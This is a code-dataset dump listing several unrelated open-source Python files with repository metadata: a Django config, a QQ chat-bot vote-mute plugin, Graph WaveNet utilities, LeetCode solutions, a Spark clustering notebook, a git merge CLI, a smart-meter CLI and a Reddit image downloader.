repo_name
stringlengths 7
111
| __id__
int64 16.6k
19,705B
| blob_id
stringlengths 40
40
| directory_id
stringlengths 40
40
| path
stringlengths 5
151
| content_id
stringlengths 40
40
| detected_licenses
list | license_type
stringclasses 2
values | repo_url
stringlengths 26
130
| snapshot_id
stringlengths 40
40
| revision_id
stringlengths 40
40
| branch_name
stringlengths 4
42
| visit_date
timestamp[ns] | revision_date
timestamp[ns] | committer_date
timestamp[ns] | github_id
int64 14.6k
687M
⌀ | star_events_count
int64 0
209k
| fork_events_count
int64 0
110k
| gha_license_id
stringclasses 12
values | gha_fork
bool 2
classes | gha_event_created_at
timestamp[ns] | gha_created_at
timestamp[ns] | gha_updated_at
timestamp[ns] | gha_pushed_at
timestamp[ns] | gha_size
int64 0
10.2M
⌀ | gha_stargazers_count
int32 0
178k
⌀ | gha_forks_count
int32 0
88.9k
⌀ | gha_open_issues_count
int32 0
2.72k
⌀ | gha_language
stringlengths 1
16
⌀ | gha_archived
bool 1
class | gha_disabled
bool 1
class | content
stringlengths 10
2.95M
| src_encoding
stringclasses 5
values | language
stringclasses 1
value | is_vendor
bool 2
classes | is_generated
bool 2
classes | length_bytes
int64 10
2.95M
| extension
stringclasses 19
values | num_repo_files
int64 1
202k
| filename
stringlengths 4
112
| num_lang_files
int64 1
202k
| alphanum_fraction
float64 0.26
0.89
| alpha_fraction
float64 0.2
0.89
| hex_fraction
float64 0
0.09
| num_lines
int32 1
93.6k
| avg_line_length
float64 4.57
103
| max_line_length
int64 7
931
|
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
kolodnikovm/django | 16,552,803,969,138 | 9159a387e2d994021ffb81d2dfbd4eecc1ad9cbb | 4236f19ced3a54e397803bed055c25d913a63c5e | /appdir/photogal/__init__.py | 49a85de60e561d5849e5584f6dc3080d365aa01c | []
| no_license | https://github.com/kolodnikovm/django | 70c2512d79ae89a03d9b4362e7c55ea7440cb3b6 | 30d65d85190bba8d7c43334a00a213ce90ca8233 | refs/heads/master | 2021-09-11T05:54:29.070754 | 2018-01-25T11:38:49 | 2018-01-25T11:38:49 | 115,706,950 | 0 | 0 | null | false | 2018-02-26T10:38:21 | 2017-12-29T09:08:53 | 2018-01-20T14:45:19 | 2018-02-26T10:36:11 | 7,285 | 0 | 0 | 3 | Python | false | null | default_app_config = 'photogal.apps.PhotogalConfig' | UTF-8 | Python | false | false | 51 | py | 21 | __init__.py | 14 | 0.823529 | 0.823529 | 0 | 1 | 51 | 51 |
Yuandiaodiaodiao/toolman | 532,575,950,290 | 3bde0c7b265653ea221f539d7731ae89fb72fea6 | 6fac6f096812ba0b38dace94e894b96318767b4b | /botCore/plugins/voteBan.py | 17cc3e2ae0b72c0f5623935855b0f68eb4167b8b | []
| no_license | https://github.com/Yuandiaodiaodiao/toolman | fa3d8c61abc332eb1781bff63823609905c0e9da | a268f018d28236c04ccca1f84803888baeffc1bf | refs/heads/master | 2020-09-11T04:13:22.363883 | 2020-07-24T09:05:20 | 2020-07-24T09:05:20 | 221,935,488 | 9 | 2 | null | null | null | null | null | null | null | null | null | null | null | null | null | import aiohttp
from nonebot.message import Message, MessageSegment
import nonebot
from nonebot import on_command, CommandSession
from nonebot.natural_language import on_natural_language, NLPSession, NLPResult, IntentCommand
from nonebot.permission import *
banList = {}
banConfig = {
'967636480': 3
}
@on_natural_language(keywords={'投票禁言'})
async def _(session: NLPSession):
return IntentCommand(50.0, ('投票禁言',), None)
@on_command('投票禁言', permission=GROUP | DISCUSS)
async def banVote(session: CommandSession):
banQQ = None
for x in session.ctx['message']:
if x.type == 'at':
banQQ = x.data['qq']
if banQQ is None:
return
groupId = session.ctx['group_id']
if banList.get(groupId) is None:
banList[groupId] = {}
groupBanList = banList[groupId]
if groupBanList.get(banQQ) is None:
groupBanList[banQQ] = []
usrId = session.ctx.get('user_id')
if usrId not in groupBanList[banQQ]:
groupBanList[banQQ].append(usrId)
limit = banConfig.get(str(groupId))
bot = nonebot.get_bot()
if limit is None:
try:
info = await bot.get_group_info(group_id=groupId)
limit = info.get('member_count') // 3
except CQHttpError as e:
pass
return
msg = Message()
try:
info = await bot.get_group_member_info(group_id=groupId, user_id=banQQ)
except CQHttpError as e:
pass
return
msg.extend(f"投票对{info.get('nickname')}的禁言{len(groupBanList[banQQ])}/{limit}")
await session.send(msg)
if len(groupBanList[banQQ]) >= limit:
try:
info = await bot.set_group_ban(group_id=groupId, user_id=banQQ, duration=60 * limit)
groupBanList[banQQ] = None
except CQHttpError as e:
pass
return
| UTF-8 | Python | false | false | 1,964 | py | 42 | voteBan.py | 34 | 0.599066 | 0.590768 | 0 | 60 | 31.133333 | 100 |
zhwdzh/Graph-WaveNet-RUL | 11,364,483,475,520 | 1ab207f7a4b48b64c71759e36e1f10ce27859898 | 0eee776169885dde972193066e97cbe037a063b9 | /util.py | 51408b3f41975925ec65efe96771041a9e834b55 | []
| no_license | https://github.com/zhwdzh/Graph-WaveNet-RUL | 8b46b2f31a4670c6d2f057b2eab70f06525c8847 | 30d971e06e57289148121303ae61849b0ea34ab5 | refs/heads/master | 2022-04-05T08:59:25.897413 | 2020-02-13T05:49:14 | 2020-02-13T05:49:14 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | import pickle
import numpy as np
import os
import scipy.sparse as sp
import torch
from scipy.sparse import linalg
from cmapssdata import CMAPSSDataset
class DataLoader(object):
def __init__(self, xs, ys, batch_size, pad_with_last_sample=True):
"""
:param xs:
:param ys:
:param batch_size:
:param pad_with_last_sample: pad with the last sample to make number of samples divisible to batch_size.
"""
self.batch_size = batch_size
self.current_ind = 0
size = len(xs)
self.num_batch = int(size // self.batch_size)
self.size = self.batch_size*self.num_batch
self.xs = xs[:self.size,...]
self.ys = ys[:self.size,...]
def shuffle(self):
permutation = np.random.permutation(self.size)
xs, ys = self.xs[permutation], self.ys[permutation]
self.xs = xs
self.ys = ys
def get_iterator(self):
self.current_ind = 0
def _wrapper():
while self.current_ind < self.num_batch:
start_ind = self.batch_size * self.current_ind
end_ind = min(self.size, self.batch_size * (self.current_ind + 1))
x_i = self.xs[start_ind: end_ind, ...]
y_i = self.ys[start_ind: end_ind, ...]
yield (x_i, y_i)
self.current_ind += 1
return _wrapper()
class StandardScaler():
"""
Standard the input
"""
def __init__(self, mean, std):
self.mean = mean
self.std = std
def transform(self, data):
return (data - self.mean) / self.std
def inverse_transform(self, data):
return (data * self.std) + self.mean
def sym_adj(adj):
"""Symmetrically normalize adjacency matrix."""
adj = sp.coo_matrix(adj)
rowsum = np.array(adj.sum(1))
d_inv_sqrt = np.power(rowsum, -0.5).flatten()
d_inv_sqrt[np.isinf(d_inv_sqrt)] = 0.
d_mat_inv_sqrt = sp.diags(d_inv_sqrt)
return adj.dot(d_mat_inv_sqrt).transpose().dot(d_mat_inv_sqrt).astype(np.float32).todense()
def asym_adj(adj):
adj = sp.coo_matrix(adj)
rowsum = np.array(adj.sum(1)).flatten()
d_inv = np.power(rowsum, -1).flatten()
d_inv[np.isinf(d_inv)] = 0.
d_mat= sp.diags(d_inv)
return d_mat.dot(adj).astype(np.float32).todense()
def calculate_normalized_laplacian(adj):
"""
# L = D^-1/2 (D-A) D^-1/2 = I - D^-1/2 A D^-1/2
# D = diag(A 1)
:param adj:
:return:
"""
adj = sp.coo_matrix(adj)
d = np.array(abs(adj).sum(1))
d_inv_sqrt = np.power(d, -0.5).flatten()
d_inv_sqrt[np.isinf(d_inv_sqrt)] = 0.
d_mat_inv_sqrt = sp.diags(d_inv_sqrt)
normalized_laplacian = sp.eye(adj.shape[0]) - adj.dot(d_mat_inv_sqrt).transpose().dot(d_mat_inv_sqrt).tocoo()
return normalized_laplacian
def calculate_scaled_laplacian(adj_mx, lambda_max=2, undirected=True):
if undirected:
adj_mx = np.maximum.reduce([adj_mx, adj_mx.T])
L = calculate_normalized_laplacian(adj_mx)
if lambda_max is None:
lambda_max, _ = linalg.eigsh(L, 1, which='LM')
lambda_max = lambda_max[0]
L = sp.csr_matrix(L)
M, _ = L.shape
I = sp.identity(M, format='csr', dtype=L.dtype)
L = (2 / lambda_max * L) - I
return L.astype(np.float32).todense()
def load_pickle(pickle_file):
try:
with open(pickle_file, 'rb') as f:
pickle_data = pickle.load(f)
except UnicodeDecodeError as e:
with open(pickle_file, 'rb') as f:
pickle_data = pickle.load(f, encoding='latin1')
except Exception as e:
print('Unable to load data ', pickle_file, ':', e)
raise
return pickle_data
def load_adj(adj_mx, adjtype):
#sensor_ids, sensor_id_to_ind, adj_mx = load_pickle(pkl_filename)
if adjtype == "scalap":
adj = [calculate_scaled_laplacian(adj_mx)]
elif adjtype == "normlap":
adj = [calculate_normalized_laplacian(adj_mx).astype(np.float32).todense()]
elif adjtype == "symnadj":
adj = [sym_adj(adj_mx)]
elif adjtype == "transition":
adj = [asym_adj(adj_mx)]
elif adjtype == "doubletransition":
adj = [asym_adj(adj_mx), asym_adj(np.transpose(adj_mx))]
elif adjtype == "identity":
adj = [np.diag(np.ones(adj_mx.shape[0])).astype(np.float32)]
else:
error = 0
assert error, "adj type not defined"
#return sensor_ids, sensor_id_to_ind, adj
return adj
def load_dataset(fd_number, batch_size, sequence_length, normalized_k, adjtype):
datasets = CMAPSSDataset(fd_number, batch_size, sequence_length, normalized_k)
train_data = datasets.get_train_data()
test_data = datasets.get_test_data()
x = np.concatenate([datasets.get_feature_slice(train_data), datasets.get_feature_slice(test_data)], axis=0)
y = np.concatenate([datasets.get_label_slice(train_data), datasets.get_label_slice(test_data)], axis=0)
x = np.expand_dims(x, axis=-1)
adj_mx = datasets.get_adj()
adj_mx = np.exp(adj_mx)
num_samples = x.shape[0]
num_test = round(num_samples * 0.2)
num_train = round(num_samples * 0.7)
num_val = num_samples - num_test - num_train
data = {}
data['x_train'], data['y_train'] = x[:num_train], y[:num_train]
data['x_val'], data['y_val'] = (
x[num_train: num_train + num_val],
y[num_train: num_train + num_val],
)
data['x_test'], data['y_test'] = x[-num_test:], y[-num_test:]
data['train_loader'] = DataLoader(data['x_train'], data['y_train'], batch_size)
data['val_loader'] = DataLoader(data['x_val'], data['y_val'], batch_size)
data['test_loader'] = DataLoader(data['x_test'], data['y_test'], batch_size)
if adjtype == "scalap":
adj = [calculate_scaled_laplacian(adj_mx)]
elif adjtype == "normlap":
adj = [calculate_normalized_laplacian(adj_mx).astype(np.float32).todense()]
elif adjtype == "symnadj":
adj = [sym_adj(adj_mx)]
elif adjtype == "transition":
adj = [asym_adj(adj_mx)]
elif adjtype == "doubletransition":
adj = [asym_adj(adj_mx), asym_adj(np.transpose(adj_mx))]
elif adjtype == "identity":
adj = [np.diag(np.ones(adj_mx.shape[0])).astype(np.float32)]
else:
error = 0
assert error, "adj type not defined"
return data, adj
def masked_mse(preds, labels):
loss = (preds-labels)**2
return torch.mean(loss)
def masked_rmse(preds, labels):
return torch.sqrt(masked_mse(preds=preds, labels=labels))
def masked_mae(preds, labels):
loss = torch.abs(preds-labels)
return torch.mean(loss)
def masked_mape(preds, labels):
loss = torch.abs(preds-labels)/labels
return torch.mean(loss)
def score(preds, labels):
d = labels - preds
for index,m in enumerate(d):
if (m>=0):
d[index]=m/10
#dp.append(m/10)
else:
d[index]=-m/13
#dp.append(-m/13)
return torch.mean(torch.exp(d) - 1)
def metric(pred, real):
mae = masked_mae(pred,real).item()
#mape = masked_mape(pred,real).item()
rmse = masked_rmse(pred,real).item()
score = score(pred,real).item()
return mae,rmse,score
| UTF-8 | Python | false | false | 7,184 | py | 3 | util.py | 3 | 0.596464 | 0.587138 | 0 | 216 | 32.25 | 113 |
ganhan999/ForLeetcode | 11,613,591,586,913 | 1251fdd8040010169e97a3232704c814db865898 | 3ba2d4091332b9d0a2b053f15a4d4ce4ae1c1ef0 | /108、将有序数组转换为二叉搜索树.py | 172c2b4da8e58cc8b27e5b4b94b058a2b9fca913 | []
| no_license | https://github.com/ganhan999/ForLeetcode | 126272d34250035abda6c2d67222c2c186a3f80b | 9980a9e4bf448b2cf3fed98891a54b6d202a64db | refs/heads/master | 2023-05-01T14:21:49.883692 | 2021-05-12T08:59:51 | 2021-05-12T08:59:51 | 348,708,572 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | """
将一个按照升序排列的有序数组,转换为一棵高度平衡二叉搜索树。
本题中,一个高度平衡二叉树是指一个二叉树每个节点的左右两个子树的高度差的绝对值不超过 1。
示例:
给定有序数组: [-10,-3,0,5,9],
一个可能的答案是:[0,-3,9,-10,null,5],它可以表示下面这个高度平衡二叉搜索树:
0
/ \
-3 9
/ /
-10 5
"""
"""
思路分析:
DFS,递归,用二分的思想。
"""
#我的做法
class Solution:
def sortedArrayToBST(self, nums: List[int]) -> TreeNode:
maxlength=len(nums)
def DFS(left,right):
if left>right:
return
mid=(left+right)//2
root=TreeNode(nums[mid])
root.left=DFS(left,mid-1)
root.right=DFS(mid+1, right)
return root
return DFS(0, maxlength-1)
| UTF-8 | Python | false | false | 904 | py | 184 | 108、将有序数组转换为二叉搜索树.py | 184 | 0.543478 | 0.506211 | 0 | 36 | 16.75 | 60 |
dheerajgoudb/Big-Data | 10,127,532,907,127 | 3c5086a26da1d751928c35bd9a22fea0f43f081e | 7904fb38c7e9f930bef0a1b1899b24e800491873 | /Assignment4/Part2/Section2.py | 86ff4eb61e1f98aa7f8c4442da6a4a3988dc0da5 | []
| no_license | https://github.com/dheerajgoudb/Big-Data | d14ac621cc8be6949537166e204769dabead2891 | 7bfc21fa351307bdb3ea162acab76b6143c9c3d5 | refs/heads/master | 2021-01-23T04:19:46.950833 | 2018-11-22T04:14:14 | 2018-11-22T04:14:14 | 86,184,975 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | # Databricks notebook source
# MAGIC %md
# MAGIC ### ***PART-III (Section 2: Clustering)***
# MAGIC In this section, we cluster the dataset into K different clusters using clustering techniques like 'K-Means' Clustering.
# COMMAND ----------
# MAGIC %md
# MAGIC ##### ***User Knowledge Modeling Data Set***
# MAGIC Abstract: It is the real dataset about the students' knowledge status about the subject of Electrical DC Machines. http://archive.ics.uci.edu/ml/datasets/User+Knowledge+Modeling
# COMMAND ----------
students = sc.textFile("/FileStore/tables/6rsya5vv1490134063282/StudentKnowledgeData.csv")
# COMMAND ----------
#In the above loaded file, the first row contain the names of the columns. We remove it and parse the dataset
colNames = students.first()
studentsRDD = students.filter(lambda x: x != colNames).map(lambda line: [float(i) for i in line.split(',')])
print 'Number of Rows: %s' %studentsRDD.count()
print 'First two rows: %s' %studentsRDD.take(2)
# COMMAND ----------
#Now we will load the packages
from pyspark.mllib.clustering import KMeans, KMeansModel
from numpy import array
from math import sqrt
#Build the model
clusters = KMeans.train(studentsRDD, 4, maxIterations = 10,initializationMode = "random")
#calculating sum of squared errors
def error(point):
center = clusters.centers[clusters.predict(point)]
return sqrt(sum([x**2 for x in (point - center)]))
WSSSE = studentsRDD.map(lambda point: error(point)).reduce(lambda x, y: x + y)
print("Sum of Squared Error = " + str(WSSSE))
# COMMAND ----------
#Now, we will calculate Sum of Squared Error for different values of k
for k in range(1,5):
clusters = KMeans.train(studentsRDD, k, maxIterations = 10,initializationMode = "random")
WSSSE = studentsRDD.map(lambda point: error(point)).reduce(lambda x, y: x + y)
print("Sum of Squared Error for "+ str(k) +"= " + str(WSSSE))
| UTF-8 | Python | false | false | 1,878 | py | 14 | Section2.py | 5 | 0.715655 | 0.702343 | 0 | 48 | 38.125 | 185 |
oscm/devops | 386,547,100,759 | 3183cabf8efe4e649566d38469d1c9900a6a3fcc | 3519864c86fbf9de185c74e42fc37404dc0491ee | /bin/merge | 4f98e51b7deccc127111203064fbb69a350991e8 | [
"MIT"
]
| permissive | https://github.com/oscm/devops | 21acdeb46619ac5a9c01c58762716037cf5b7c9f | 012eb08eceefa500e40d7fedf63f25ef858474ed | refs/heads/master | 2022-08-22T16:24:11.371104 | 2022-08-22T03:38:23 | 2022-08-22T03:38:23 | 18,361,108 | 26 | 22 | null | true | 2015-03-03T09:50:16 | 2014-04-02T09:24:39 | 2015-02-04T08:13:02 | 2015-03-03T09:50:16 | 539 | 2 | 3 | 0 | Python | null | null | #!/usr/bin/env python3
# -*- coding: UTF-8 -*-
###################################
# git branch merge
# Author: netkiller@msn.com
# Home: http://www.netkiller.cn
###################################
try:
import os,io,sys,subprocess
import logging, configparser
from logging import getLogger
# import threading
from optparse import OptionParser, OptionGroup
# import time
# from datetime import datetime
module = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
sys.path.insert(0,module)
from netkiller.git import *
except ImportError as err:
print("Error: %s" %(err))
class Merge():
def __init__(self):
self.workspace = None
usage = "usage: %prog [options] <parameter>"
self.parser = OptionParser(usage)
self.parser.add_option('-w','--workspace', dest='workspace', help='workspace ~/workspace', default='None', metavar='~/workspace')
self.parser.add_option('-p','--project', dest='project', help='project directory', default=None, metavar='')
self.parser.add_option('-l','--logfile', dest='logfile', help='log file', default='/tmp/merge.log', metavar='/tmp/merge.log')
self.parser.add_option('-d', '--debug', dest='debug', action='store_true', help="debug")
group = OptionGroup(self.parser, "Repository")
group.add_option('-c','--clone', dest='clone', help='clone branch', default=None, metavar='')
group.add_option('-r','--reset', dest='reset', help='Reset current HEAD to the specified state', default=None, metavar='8547cb94')
group.add_option('-b','--checkout', dest='checkout', help='checkout branch', default=None, metavar='master')
self.parser.add_option_group(group)
group = OptionGroup(self.parser, "Custom merge branch")
group.add_option('-s', '--source', dest='source', help='source', default=None, metavar='development')
group.add_option('-t','--to', dest='target', help='target', default=None, metavar='testing')
group.parser.add_option_group(group)
group = OptionGroup(self.parser, "Workflow merge development -> testing -> staging -> production(master)")
group.add_option('', '--testing', dest='testing', action='store_true', default = False, help="from development to testing")
group.add_option('', '--staging', dest='staging', action='store_true', default = False, help="from testing to staging")
group.add_option('', '--production', dest='production', action='store_true', default = False, help="from staging to production(master)")
self.parser.add_option_group(group)
group = OptionGroup(self.parser, "Create branch")
group.add_option('-B','--branch', dest='branch', help='create custom branch', default=None, metavar='mybranch')
group.add_option('-f','--feature', dest='feature', help='feature branch from development', default=None, metavar='feature/0001')
group.add_option('-H','--hotfix', dest='hotfix', help='hotfix branch from master', default=None, metavar='hotfix/0001')
self.parser.add_option_group(group)
(self.options, self.args) = self.parser.parse_args()
try:
if self.options.debug :
print(self.options, self.args)
logging.basicConfig(stream=sys.stdout, level=logging.DEBUG, format='%(asctime)s %(levelname)-8s %(message)s', datefmt='%Y-%m-%d %H:%M:%S')
elif self.options.logfile :
logging.basicConfig(level=logging.NOTSET, format='%(asctime)s %(levelname)-8s %(message)s', datefmt='%Y-%m-%d %H:%M:%S', filename=self.options.logfile, filemode='a')
except Exception as err:
print("Error: %s" %(err))
sys.exit(2)
self.logger = getLogger(__name__)
def usage(self):
print("Netkiller git administrator")
self.parser.print_help()
print("\nHomepage: http://www.netkiller.cn\tAuthor: Neo <netkiller@msn.com>")
exit()
def branch(self, name):
git = GitBranch(self.project,self.logger)
if len(self.args) == 1 :
git.create(name, self.args[0])
else:
git.create(name)
git.list()
git.debug()
git.execute()
def feature(self,name = None):
git = GitBranch(self.project,self.logger)
if name :
git.create('feature/%s' % name)
else:
git.create('feature')
git.list()
git.debug()
git.execute()
def hotfix(self,name = None):
git = GitBranch(self.project,self.logger)
if name :
git.create('hotfix/%s' % name)
else:
git.create('hotfix')
git.list()
git.debug()
git.execute()
def clone(self,url):
git = Git(self.workspace, self.logger)
git.clone(url)
git.execute()
def merge(self, source, target):
git = GitMerge(self.project,self.logger)
git.source(source).target(target).merge().push()
git.execute()
def checkout(self, branch):
git = GitCheckout(self.project,self.logger)
git.checkout(branch).pull().execute()
def reset(self, ver):
git = GitReset(self.project,self.logger)
git.hard(ver).push(True).execute()
def main(self):
if self.options.workspace :
self.workspace = self.options.workspace
if self.options.project :
if self.workspace :
self.project = self.workspace + '/' + self.project
else:
self.project = self.options.project
else:
self.project = os.getcwd()
if self.options.clone :
self.clone(self.options.clone)
exit()
if self.options.checkout :
self.checkout(self.options.checkout)
if self.options.reset :
self.reset(self.options.reset)
if self.options.branch :
self.branch(self.options.branch)
elif self.options.feature :
self.feature(self.options.feature)
elif self.options.hotfix :
self.hotfix(self.options.hotfix)
if self.options.source and self.options.target :
self.merge(self.options.source, self.options.target)
if self.options.testing :
self.merge('development', 'testing')
elif self.options.staging :
self.merge('testing', 'staging')
elif self.options.production :
self.merge('staging', 'master')
pass
self.logger.info('-' * 50)
if __name__ == '__main__':
try:
merge = Merge()
merge.main()
except KeyboardInterrupt:
print ("Crtl+C Pressed. Shutting down.") | UTF-8 | Python | false | false | 5,901 | 195 | merge | 94 | 0.677851 | 0.673784 | 0 | 162 | 35.432099 | 169 |
|
jimmy623/LeetCode | 85,899,380,808 | 88638b0a0aa2e66daf392c252780daf397925ecb | ac47f86e4fbd46c641575b2a8ccc401fd70c98e9 | /Solutions/Reverse Nodes in k-Group.py | 6e4a3248666245684319cfca8be503642a0f5033 | []
| no_license | https://github.com/jimmy623/LeetCode | 0a19f6e32c29e087e2d808153cb7a6e3794e2b67 | c4c1838bcde53484d3df654714bbbf6589c03c37 | refs/heads/master | 2021-07-12T06:02:14.973878 | 2021-03-14T16:03:26 | 2021-03-14T16:03:26 | 25,859,418 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | # Definition for singly-linked list.
class ListNode:
def __init__(self, x):
self.val = x
self.next = None
def __repr__(self):
string = "val:" + str(self.val) + " next:"
if self.next == None:
string += "None"
else:
string += str(self.next.val)
return string
def printList(head):
print "print list"
string = ""
while head != None:
string += str(head.val)+"->"
head = head.next
string = string[:-2]
print string
class Solution:
# @param head, a ListNode
# @param k, an integer
# @return a ListNode
def reverseKGroup(self, head, k):
if head == None:
return head
remains = True
last = None
point = head
while remains:
nodes = []
for i in range(k):
nodes.append(point)
if point.next == None:
remains = False
break
point = point.next
if len(nodes) != k:
break
if point == None:
remains = False
nodes[0].next = None
else:
nodes[0].next = nodes[k-1].next
for i in range(k-1,0,-1):
nodes[i].next = nodes[i-1]
if last == None:
head = nodes[k-1]
else:
last.next = nodes[k-1]
last = nodes[0]
point = last.next
return head
a = ListNode(1)
b = ListNode(2)
c = ListNode(3)
d = ListNode(4)
e = ListNode(5)
a.next = b
b.next = c
c.next = d
d.next = e
s = Solution()
result = s.reverseKGroup(a,3)
printList(result)
#https://oj.leetcode.com/problems/reverse-nodes-in-k-group/
#Reverse Nodes in k-Group | UTF-8 | Python | false | false | 1,827 | py | 317 | Reverse Nodes in k-Group.py | 316 | 0.472359 | 0.463054 | 0 | 88 | 19.772727 | 59 |
HeftyB/code-challenge | 7,129,645,721,015 | 978ba9dc15a409864713a72e77538d1ffe0fb331 | 152243a8a816f588c1a59c4fd92493c0f7736f3b | /queue-using-stacks/queue-using-stacks.py | 3aa90808299f3897282944ca67551cd03dca9faa | [
"MIT"
]
| permissive | https://github.com/HeftyB/code-challenge | 442de7adddd00c3dbefadb919e567aa56f5dc5b6 | e23d9182f1da9bbd9bf3d2d97a22652513ec1b7d | refs/heads/master | 2023-05-01T17:16:24.294954 | 2021-05-20T02:16:34 | 2021-05-20T02:16:34 | 297,471,495 | 0 | 0 | MIT | false | 2021-01-29T04:54:26 | 2020-09-21T22:04:56 | 2021-01-27T04:59:17 | 2021-01-29T04:54:26 | 68 | 0 | 0 | 0 | Python | false | false | """
Implement the following operations of a queue using stacks.
push(x) -- Push element x to the back of queue.
pop() -- Removes the element from in front of queue.
peek() -- Get the front element.
empty() -- Return whether the queue is empty.
Example:
MyQueue queue = new MyQueue();
queue.push(1);
queue.push(2);
queue.peek(); // returns 1
queue.pop(); // returns 1
queue.empty(); // returns false
"""
# SOLUTION 1
# use an array as a stack container
# push - using a temporary stack pop all items from original stack
# add new item to empty original stack
# pop the items off the temp stack back on to original
# pop - using pop() return .pop(0)
# peek - return value at index 0 of stack array
# empty - return true if length of stack array is == 0
class MyQueue:
def __init__(self):
self.stack = []
def push(self, x: int) -> None:
self.stack.append(x)
return self.stack
def pop(self) -> int:
return self.stack.pop(0)
def peek(self) -> int:
return self.stack[0]
def empty(self) -> bool:
if len(self.stack) > 0:
return False
else:
return True
| UTF-8 | Python | false | false | 1,200 | py | 42 | queue-using-stacks.py | 36 | 0.611667 | 0.6025 | 0 | 56 | 20.285714 | 66 |
nrocco/smeterd | 2,284,922,630,860 | 2a760a551a64b0c36530ae4508038503b836a29c | 815cbff2d660a04880be8ead0becfe5e20b30fbb | /smeterd/cli/__init__.py | 83ad8783824275d44d7f61c9a456281cf53c913f | [
"MIT"
]
| permissive | https://github.com/nrocco/smeterd | e697721b31de9b18e2be782e986de607c82759d5 | d0f6b5f5028bb0cd3ee7fedbe5c5753cfc8394cb | refs/heads/master | 2023-03-12T08:29:47.689970 | 2023-03-02T11:35:42 | 2023-03-02T11:35:42 | 9,798,114 | 40 | 19 | MIT | false | 2023-03-02T11:35:43 | 2013-05-01T19:11:22 | 2023-01-27T08:10:43 | 2023-03-02T11:35:42 | 362 | 31 | 19 | 3 | Python | false | false | import click
import logging
from smeterd import __version__
from .read_meter import read_meter
logging.basicConfig(format='[%(asctime)-15s] %(levelname)s %(message)s')
@click.group()
@click.version_option(version=__version__)
def cli():
"""Read smart meter P1 packets"""
pass
cli.add_command(read_meter)
| UTF-8 | Python | false | false | 319 | py | 17 | __init__.py | 10 | 0.705329 | 0.695925 | 0 | 18 | 16.722222 | 72 |
sainad2222/my_cp_codes | 15,736,760,179,858 | bc4d2b56b063197d9c4e1b61a7d604a977f6a4d4 | dfcadafb9b7aee820a6eebba7b67dc31c0cabda5 | /codeforces/233/A.py | 778e10fff806c8a80f6802a593e85d0dd7bb34e0 | []
| no_license | https://github.com/sainad2222/my_cp_codes | 0b631872e96ff84897dd498caf4a6ed5ba4f9c15 | 4621a2b6d80ea5dc36401481bba58096192e0822 | refs/heads/master | 2023-02-15T20:42:03.524179 | 2021-01-12T09:14:00 | 2021-01-15T07:45:41 | 324,394,919 | 1 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | n = int(input())
if(n&1):
print(-1)
else:
for i in range(n//2):
print(2*(i+1),2*(i+1)-1,end=" ") | UTF-8 | Python | false | false | 117 | py | 375 | A.py | 372 | 0.435897 | 0.367521 | 0 | 6 | 17.833333 | 40 |
CharlieCorner/pymage_downloader | 6,863,357,757,017 | bc86229237d294dc0b98a8c1b3c3394e60e3f916 | 8599d454d4deb84648a6695afd2bf700ffcaa7cf | /downloaders/reddit_downloader.py | 7fcb2a1cb9b8957aa2d4ad5be13f4bc9f99dd4d7 | [
"Apache-2.0"
]
| permissive | https://github.com/CharlieCorner/pymage_downloader | c3516e155e65c3828570ebcdd389108d71b73d65 | 797cac0afffc235aa966c88342fe378b964b5ed9 | refs/heads/master | 2023-05-27T20:38:24.505796 | 2023-05-23T17:45:19 | 2023-05-23T17:45:19 | 97,399,927 | 0 | 0 | Apache-2.0 | false | 2023-05-23T17:45:20 | 2017-07-16T17:41:02 | 2020-12-14T04:58:41 | 2023-05-23T17:45:19 | 53 | 0 | 0 | 6 | Python | false | false | import glob
import logging
import os
from argparse import Namespace
import praw
from downloaders.downloader import Downloader
from exceptions.pymage_exceptions import NotAbleToDownloadException
from parsers.parser_factory import ParserFactory
from utils.utils import download_images
LOGGER = logging.getLogger(__name__)
class RedditDownloader(Downloader):
REDDIT_FILE_PATTERN = "reddit_*_%s_*"
def __init__(self):
super().__init__(RedditDownloader.REDDIT_FILE_PATTERN)
def download(self, args: Namespace):
if args.reddit_mode == "user":
r = praw.Reddit(username=args.user, password=args.password)
else:
r = praw.Reddit()
start_from = args.start_from
for page in range(0, args.page_limit):
LOGGER.info("Starting getting posts from page %s" % start_from)
submissions = self._get_submissions(r, args, start_from)
self._process_posts(submissions, args)
next_page = submissions.params["after"]
# We might get the same next_page as the start_from if the next listing
# is less than 25, the default posts per pages coming from PRAW
if not next_page or next_page is start_from:
LOGGER.info("No more posts to fetch.")
break
start_from = next_page
def _get_submissions(self, reddit, args, start_from=None):
params = {"after": start_from}
if args.reddit_mode == "user":
if args.should_get_upvoted:
submissions = reddit.redditor(args.user).upvoted(limit=args.limit, params=params)
else:
submissions = reddit.redditor(args.user).saved(limit=args.limit, params=params)
else:
subreddit = reddit.subreddit(args.subreddit if isinstance(args.subreddit, str) else "+".join(args.subreddit))
if args.type == "controversial":
submissions = subreddit.controversial(time_filter=args.period, limit=args.limit, params=params)
elif args.type == "new":
submissions = subreddit.new(limit=args.limit, params=params)
elif args.type == "top":
submissions = subreddit.top(time_filter=args.period, limit=args.limit, params=params)
else:
submissions = subreddit.hot(limit=args.limit, params=params)
return submissions
def _process_posts(self, submissions, args):
for post in submissions:
if not isinstance(post, praw.models.Submission) or post.is_self:
LOGGER.info("Skipping post %s as it is not a submission or is a self post..." % post.id)
continue
LOGGER.debug("Post domain: %s" % post.domain)
pattern_to_search = os.path.join(args.folder, (self.filename_pattern % post.id))
LOGGER.debug("Pattern to search: %s" % pattern_to_search)
if not args.should_overwrite and len(glob.glob(pattern_to_search)) > 0:
LOGGER.info("Skipping post %s, we already have its images..." % post.id)
continue
parser = ParserFactory.get_parser(post.url, args)
if not parser:
continue
try:
images = parser.get_images(post)
download_images(images, args.folder)
except NotAbleToDownloadException as e:
LOGGER.error(e)
LOGGER.info("The next post ID is: %s" % submissions.params['after'])
| UTF-8 | Python | false | false | 3,530 | py | 22 | reddit_downloader.py | 19 | 0.613314 | 0.612181 | 0 | 93 | 36.956989 | 121 |
